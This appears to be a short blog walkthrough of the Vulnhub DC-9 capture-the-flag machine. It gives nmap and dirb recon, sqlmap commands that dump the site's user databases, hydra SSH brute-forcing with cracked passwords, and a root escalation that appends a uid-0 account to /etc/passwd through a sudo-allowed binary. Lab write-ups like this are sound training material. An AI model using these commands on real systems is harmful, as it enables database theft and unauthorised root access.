Vulnhub DC-9 Walkthrough

Scanning the host with nmap –A –T4 –p- –vv

Port 22 came as filtered so I ran a small script to know it and it came as open

Dirb to see php pages

A search page where we can search for anything and capture the search results output with burpsuite .

Copy it save it to a text file and run it through sqlmap : sqlmap –r sql.txt –dbs –batch

Then we use sqlmap -r sql.txt -D Staff –dump-all –batch

Sqlmap –r sql.txt –D users –dump-all –batch

Now lets try the ssh service as we before were able to port knock it, using hydra came up with 3 hits :

( I cracked the admin pass online and it came transorbital1 .. BUT I tried to ssh with it didn’t work)

hydra -L users.txt -P pass.txt ssh:// -vV

joeyt  Passw0rd

chandlerb  UrAG0D!

janitor  Ilovepeepee

let’s try each one and see

Now let’s try hydra again with the new passwords hydra -L users.txt -P new_pass.txt ssh:// –vV

Ok we going to create a new user and append the password into /etc/passwd as following

fredf@dc-9:~$ openssl passwd -1 -salt hacker 123456


fredf@dc-9:~$ echo ‘hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash’ >> /tmp/hacker

fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test /tmp/hacker /etc/passwd

fredf@dc-9:~$ su hacker


root@dc-9:/home/fredf# id

uid=0(root) gid=0(root) groups=0(root)

root@dc-9:/home/fredf# cd  /root

root@dc-9:~# ls


root@dc-9:~# cat theflag.txt

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s